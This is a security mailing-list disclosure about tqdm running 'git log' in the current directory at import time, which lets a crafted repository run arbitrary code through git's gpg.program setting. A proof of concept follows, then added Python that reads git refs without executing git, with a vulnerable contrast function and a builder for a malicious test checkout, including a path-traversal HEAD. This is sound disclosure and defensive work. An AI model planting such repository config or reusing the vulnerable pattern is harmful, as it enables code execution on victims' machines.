Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
Date: Sun, 25 Dec 2016 21:47:43 +0100
From: Jakub Wilk <>
Subject: tqdm: insecure use of git

tqdm <> is a "fast, extensible progress bar for 

When you import tqdm, the tqdm._version module executes the following command:

    git log -n 1 --oneline

This was meant to check if the user is running a pre-release version of tqdm.
But cwd might be a part of an unrelated git repository, possibly a malicious 
one. At least with git 2.10 or later, it's possible to craft a repo in which 
"git log" executes arbitrary code:

    $ tail -n4 /tmp/.git/config
    [log]
            showSignature = true
    [gpg]
            program = /tmp/moogpg

    $ tail -n4 /tmp/moogpg
    #!/bin/sh
    exec > /dev/tty 2>&1
    cowsay pwned
    sleep 9999

    $ cd /tmp

    $ pydoc tqdm
    < pwned >
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||

Upstream bug report:

Affected versions: v4.4.1 and later.

Jakub Wilk
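The root cause above is that `git log` picks its repository from the caller's cwd and then honours that repository's own `.git/config`, so an import-time version probe inherits whatever the attacker put there (here `log.showSignature` plus `gpg.program`, with git 2.10 or later). The following is an added example, not tqdm's code and not the fix upstream shipped: it keeps the "am I running from a source checkout, and at which commit?" question, but answers it by reading the ref files under a directory the package owns (assumed to be derived from the package's own `__file__`, never cwd) and never executes git at all, so no config-driven helper can be spawned. The malicious checkout it builds for the demo is constructed test data modelled on the post, with a marker file standing in for cowsay.

```python
"""Find the commit of a source checkout without executing git.

Added example, not tqdm's code.  The vulnerable pattern is kept only for
contrast; the safe variant reads .git/HEAD and the refs directly.
"""
import re
import subprocess
import tempfile
from pathlib import Path

_HEX40 = re.compile(r"^[0-9a-f]{40}$")
# refs/heads/x, refs/tags/v1, ...: plain characters, no leading slash
_REFNAME = re.compile(r"^refs(/[A-Za-z0-9_.-]+)+$")


def vulnerable_is_prerelease():
    """The pattern from the post: git chooses the repo from cwd and obeys that
    repo's config (gpg.program is run when log.showSignature is set).  Never
    call this from import-time code; it is here to show what NOT to do."""
    try:
        out = subprocess.check_output(["git", "log", "-n", "1", "--oneline"],
                                      stderr=subprocess.DEVNULL)
        return bool(out.strip())
    except (OSError, subprocess.CalledProcessError):
        return False


def _read(path):
    return path.read_text(encoding="utf-8", errors="replace").strip()


def safe_head_commit(pkg_dir):
    """Return the 40-hex commit pkg_dir/.git points at, or None if pkg_dir is
    not a plain checkout.  Only files under pkg_dir/.git are read; nothing is
    executed, so .git/config is never consulted."""
    git_dir = Path(pkg_dir) / ".git"
    if not git_dir.is_dir():        # absent, or a "gitdir:" pointer file
        return None                 # (worktrees/submodules) we refuse to follow
    head_file = git_dir / "HEAD"
    if not head_file.is_file():
        return None
    head = _read(head_file)
    if _HEX40.match(head):          # detached HEAD stores the hash directly
        return head
    if not head.startswith("ref: "):
        return None
    ref = head[len("ref: "):]
    # a crafted HEAD must not make us read outside .git
    if not _REFNAME.match(ref) or any(p in (".", "..") for p in ref.split("/")):
        return None
    loose = git_dir / ref
    if loose.is_file():
        commit = _read(loose)
        return commit if _HEX40.match(commit) else None
    packed = git_dir / "packed-refs"
    if packed.is_file():
        for line in _read(packed).splitlines():
            if line.startswith(("#", "^")):   # header and peeled-tag lines
                continue
            parts = line.split()
            if len(parts) == 2 and parts[1] == ref and _HEX40.match(parts[0]):
                return parts[0]
    return None


def safe_is_prerelease(pkg_dir):
    """True when the package is imported from a git checkout of its source."""
    return safe_head_commit(pkg_dir) is not None


DEMO_COMMIT = "0123456789abcdef0123456789abcdef01234567"


def make_malicious_checkout(root, mode="loose"):
    """Constructed test data: a checkout like the one in the post, except the
    helper that git would run drops a PWNED marker instead of calling cowsay.
    mode: "loose" (refs/heads file), "packed" (packed-refs), "detached"
    (hash in HEAD) or "traversal" (HEAD pointing outside .git)."""
    root = Path(root)
    git_dir = root / ".git"
    (git_dir / "refs" / "heads").mkdir(parents=True)
    helper = root / "moogpg"
    helper.write_text("#!/bin/sh\ntouch '%s'\n" % (root / "PWNED"))
    helper.chmod(0o755)
    (git_dir / "config").write_text(
        "[log]\n\tshowSignature = true\n[gpg]\n\tprogram = %s\n" % helper)
    if mode == "detached":
        (git_dir / "HEAD").write_text(DEMO_COMMIT + "\n")
    elif mode == "traversal":
        (git_dir / "HEAD").write_text("ref: refs/../../../../etc/hostname\n")
    else:
        (git_dir / "HEAD").write_text("ref: refs/heads/master\n")
    if mode == "packed":
        (git_dir / "packed-refs").write_text(
            "# pack-refs with: peeled fully-peeled\n%s refs/heads/master\n" % DEMO_COMMIT)
    elif mode == "loose":
        (git_dir / "refs" / "heads" / "master").write_text(DEMO_COMMIT + "\n")
    return root


def run_demo(mode="loose"):
    """Build a fresh malicious checkout and return (commit, helper_was_run)."""
    root = Path(tempfile.mkdtemp(prefix="tqdm-demo-"))
    make_malicious_checkout(root, mode)
    return safe_head_commit(root), (root / "PWNED").exists()


if __name__ == "__main__":
    for m in ("loose", "packed", "detached", "traversal"):
        print(m, run_demo(m))
```

The design point is that the safe variant has no process boundary to defend: there is no `git` invocation, so `gpg.program`, `core.pager` and every other config-driven helper are simply never reached, and the only input it trusts is the ref name from `HEAD`, which is validated before being joined to a path. If a project genuinely needs `git` output, the same rule still applies: run it with `-C <package_dir>` on a directory the package owns, never on cwd.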
